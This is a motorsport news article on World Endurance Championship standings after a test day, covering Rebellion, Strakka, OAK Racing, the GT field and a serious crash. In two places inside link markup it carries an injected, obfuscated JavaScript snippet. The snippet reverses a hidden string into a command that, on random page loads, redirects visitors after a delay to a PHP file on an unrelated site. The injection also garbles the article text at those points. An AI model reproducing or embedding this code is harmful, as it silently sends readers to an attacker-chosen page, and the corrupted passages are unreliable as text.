‘Nipping’ at the heels of the top two are the Strakka and Rebellion Racing LMP1 squads. Rebellion holds a slender four-point gap over Strakka courtesy of a category win for the Lola B11/60 in $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/wec-6hrs-of-spa-francorchamps-round-2-tick-tick-and-tick/” target=”_blank”>Spa and the Pescarolo team’s absence in Belgium (or the Jean-Christophe Bouillon/Emmanuel Collard/Julien Jousse points eligible line-up anyway). Just under two seconds covers the Danny Watts/Nick Leventis/Jonny Kane Strakka HPD ARX-03a, both Rebellion cars and the Seiji Ara/Nicolas Minassian Pescarolo-run Dome. And while a ten point deficit may be a tough start for the Pescarolo Team’s season, the prospect of another category victory to partner their $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/sebring-12-hrs-alms-wec-round-1-untouchable/” target=”_blank”>Sebring success remains wide open.

Consistent running for OAK Racing leaves the team just four points behind LMP2 rivals, Alan Docking Racing. The David Heinemeier Hansson/Bas Leinders duo left the blocks at a sprint in Spa to secure both the category win and vault OAK to the top of the standings, somewhat ironically reversing the trend of early season pacesetters Starworks Motorsport, the highs of Sebring but a memory in Belgium. But on test day OAK’s closest rivals were the #33 Level 5 Motorsports HPD ARX and the #38 Jota Zytek. Less than half a second covers these three. Heinemeier and Leinders may want to keep checking their mirrors.

In the closely fought GT category Luxury Racing’s Frederioc Makoweicki and Jaime Melo eased ahead (just) of Corvette Racing’s Oliver Gavin and Tommy Milner. After a difficult start to the season that’s netted the Luxury boys a solitary third place, a march could be what’s required to get their year back on track. AF Corse meanwhile will be enjoying on second gap back to nearest rivals Team Felbermayr-Proton, with whom they’ve traded first and second places in the opening two events.

Spoiled for choice then, seemingly. In a year where ‘dominance’ is the watchword, it’s ironic that there’s still so much to play for throughout the field. For some though, the competition has already taken its toll. Despite the cars not due to line up on the grid for another ten days, the WEC has lost another competitor. Timo Bernhard has been out of the Audi line-up since Sebring after a particularly nasty practice shunt. As test day drew to a close, Gillaume Moreau was involved in a very heavy crash in the OAK Racing Pescarolo-Judd. So severe was the impact that the Frenchman underwent emergency surgery on his 12th vertebra before the day was out, which reportedly went well.
